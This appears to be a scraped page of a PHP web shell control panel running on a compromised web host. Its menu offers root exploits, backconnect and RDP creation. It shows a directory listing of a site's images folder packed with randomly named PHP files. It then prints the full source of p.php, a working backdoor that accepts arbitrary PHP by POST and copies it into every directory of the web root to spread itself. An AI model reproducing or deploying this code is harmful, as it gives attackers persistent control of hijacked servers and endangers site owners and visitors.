Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.217.99
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
haytayan-new /
assets /
images /
[ HOME SHELL ]
Name
Size
Permission
Action
aib
[ DIR ]
drwx---r-x
cfu
[ DIR ]
drwx---r-x
iyf21
[ DIR ]
drwx---r-x
otw
[ DIR ]
drwx---r-x
ptx
[ DIR ]
drwx---r-x
wil
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
008ca20b38.php
8.14
KB
-rw----r--
01.php
494.51
KB
-rw----r--
27da0a7061.php
240.68
KB
-rw----r--
6cad8faee0.php
8.14
KB
-rw----r--
869853eb98bd.php
5.08
KB
-rw----r--
about4.php
2.21
KB
-rw----r--
accesson.php
212
B
-rw----r--
autoload_classmap.php
8.14
KB
-rw----r--
b28ccea71a.php
24.73
KB
-rw----r--
d56819733b.php
24.73
KB
-rw----r--
del.php
73
B
-rw----r--
gkmpkb.php
21.68
KB
-rw----r--
iwnhk9d02.php
7.41
KB
-rw----r--
jytvfhlh.php
760
B
-rw----r--
kbutkuhp.php
760
B
-rw----r--
log_bt.txt
0
B
-rw----r--
log_wp.txt
0
B
-rw----r--
ma.php
162.21
KB
-rw----r--
p.php
2.75
KB
-rw----r--
php.ini
78
B
-rw----r--
pwnkit
0
B
-rwx---r-x
rzhyqmcf.php
760
B
-rw----r--
smudq2m72.php
7.41
KB
-rw----r--
style.php
13.04
KB
-rw----r--
tjwkj2p95.php
7.41
KB
-rw----r--
wfohpggr.php
760
B
-rw----r--
wp-22.php
14.24
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : p.php
<?php function generateRandomString($length) { $characters = 'abcdefghijklmnopqrstuvwxyz'; $charLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charLength - 1)]; } return $randomString; } function method1() { $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } function method2() { $currentPath = $_SERVER['DOCUMENT_ROOT']; if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } if (isset($_GET['met1'])) { method1(); } else if (isset($_GET['met2'])) { method2(); } else if (isset($_GET['actmet1'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else if (isset($_GET['actmet2'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = $_SERVER['DOCUMENT_ROOT']; $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else { echo 'DeathShop'; } ?>
Close